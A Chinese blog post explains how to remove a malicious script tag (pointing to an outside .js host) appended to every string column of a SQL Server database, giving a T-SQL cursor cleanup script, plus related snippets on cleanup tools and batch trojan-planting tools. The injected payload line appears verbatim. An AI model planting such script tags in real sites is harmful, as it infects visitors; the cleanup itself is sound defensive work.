公司网站突然遭挂马,检查程序没一点问题,最后才发现数据库里只要是字符串类型的列都被追加了<script src=http://8f8el3l.cn/0.js></script>木马代码导致网站部分功能无法正常运行,可以使用以下代码来一键删除木马代码。
use test--你的数据库
go
declare @t varchar(255),@c varchar(255),@str1 varchar(8000),@str2 varchar(500),@str3 varchar(500)
declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b ,systypes c
where a.id=b.id and a.xtype='u' and c.name in ('char', 'nchar', 'nvarchar', 'varchar','text','ntext')
--这里随便选择一个表里的一列类型为字符类型
set @str1 = (select top 1 UserName from [User])
--获得要替换的字符(木马代码)
set @str2 = (substring (@str1,charindex ('<script src=http://', @str1),500))
--如果你知道是什么木马代码可以直接定义
--set @str2='<script src=http://8f8el3l.cn/0.js></script>'
set @str3=''--替换后的字符
open table_cursor
fetch next from table_cursor into @t,@c while(@@fetch_status=0)
begin exec('update [' + @t + '] set [' + @c + ']=replace(cast([' + @c + '] as varchar(8000)),'''+@str2+''','''+ @str3 +''')')
fetch next from table_cursor into @t,@c end close table_cursor deallocate table_cursor;
go
--测试
select * from [User]
分享到:
相关推荐
在本文中,我们将讨论如何处理数据库内容字段被挂马(即植入恶意代码)的情况,特别关注SQL Server环境。 【处理方法】 1. **数据备份**:在进行任何数据清理操作之前,务必先备份数据库。这样,如果在清理过程中...
### 批量替换SQL Server数据库挂马字段并防范SQL注入攻击 #### 一、背景介绍 在日常的网站运营过程中,数据库的安全性至关重要。当网站的SQL Server数据库遭受恶意挂马时,会对用户数据造成严重威胁,同时也可能...
本文将深入分析一份名为“数据库挂马修复语句.txt”的文本内容,从中提取出关键知识点,并详细介绍如何通过SQL语句对被挂马的数据库进行修复。 #### 二、理解挂马现象与危害 挂马行为不仅能够使攻击者获取数据库中...
护卫神·挂马清理工具是针对目前网页或数据库频繁被挂马的情况,我们特别开发的一款专业批量清理网页、Access数据库、SQL Server数据库和MySQL数据库挂马代码的实用软件,绿色免费;迅速帮您从海量文件和数据中清理...
在描述中提到的情况,网站被挂马,数据库表的文本字段被非法JS脚本污染,传统的清理方式是编写存储过程逐个表处理,这不仅耗时且对非数据库专业人士来说操作复杂。因此,这款工具应运而生,旨在简化这一过程,提供一...
这些木马可能是通过各种手段如SQL注入、XSS攻击等植入的,它们可能潜伏在网页代码、数据库或者服务器文件中。工具通过智能化的检测算法,能够快速定位并识别出这些威胁。 其次,"网站批量清马"功能意味着该工具可以...
SQL注入允许攻击者执行非授权的数据库操作,如读取、修改或删除敏感信息,甚至完全控制整个数据库服务器。在本例中,数据库中的文本类型字段可能被注入了类似于`'...
1433端口是Microsoft SQL Server默认使用的端口,因此这个工具很可能用于对SQL Server数据库进行攻击。 【压缩包子文件的文件名称】"1433批量自动挂马.exe"揭示了该程序的执行文件,这是一个.exe可执行文件,表明它...
3. 数据库设计:源码可能采用了关系型数据库如MySQL或非关系型数据库如MongoDB来存储用户信息、动态、评论等数据。合理的数据库设计对于提高查询效率和数据安全性至关重要。 4. 前端技术:亿乐社区源码的前端部分...
超级批量挂马(自动检测可写目录/是否只读隐藏形式保存:(嵌入代码保存时只读隐藏形式保存:可以再次嵌入代码)是否变形代码:(为了防止批量替换掉代码,代码正常运行)/过滤重复/自定义文件挂马/批量替换 14....
一个基于ASP的帮助站长维护网站安全的程序。其功能包括ASP木马查找、被篡改文件查找、可疑文件搜索、数据库安全保护等 功能: 1、ASP木马查找(能够查出现在几乎所有的ASP木马) ...8、批量反挂马
13.超级批量挂马(自动检测可写目录/是否只读隐藏形式保存:(嵌入代码保存时只读隐藏形式保存:可以再次嵌入代码)是否变形代码:(为了防止批量替换掉代码,代码正常运行)/过滤重复/自定义文件挂马/批量替换 ...
- **扫描技术:** 包括但不限于SQL注入、CGI注入、跨站脚本攻击等多种常见漏洞类型。 - **智能渗透检测:** 采用先进的智能渗透检测模型,包括0day漏洞检测、漏洞组合检测等。 #### 三、产品功能详细介绍 ##### ...
【改进】 加强参数提交过滤,防止SQL注入,防止挂马,加强字符过滤 【改进】 系统可安装在二级目录,支持php5.3以上版本安装 【改进】 优化程序代码 轻松应对千万数据级别负载 【改进】 商家注册IP限制,修正发布...
【改进】 加强参数提交过滤,防止SQL注入,防止挂马,加强字符过滤 【改进】 系统可安装在二级目录,支持php5.3以上版本安装 【改进】 优化程序代码 轻松应对千万数据级别负载 【改进】 商家注册IP限制,修正发布...
2.[*修复]修复前台存在的SQL注入风险漏洞【感谢乌云[语邑尘]发现】 3.[*修复]修复前台存在的xss跨站脚本攻击漏洞【感谢乌云[evil]发现】 4.[修复]修复内容页投票区域部分浏览器不会居中BUG 5.加强前台提交表单信息的...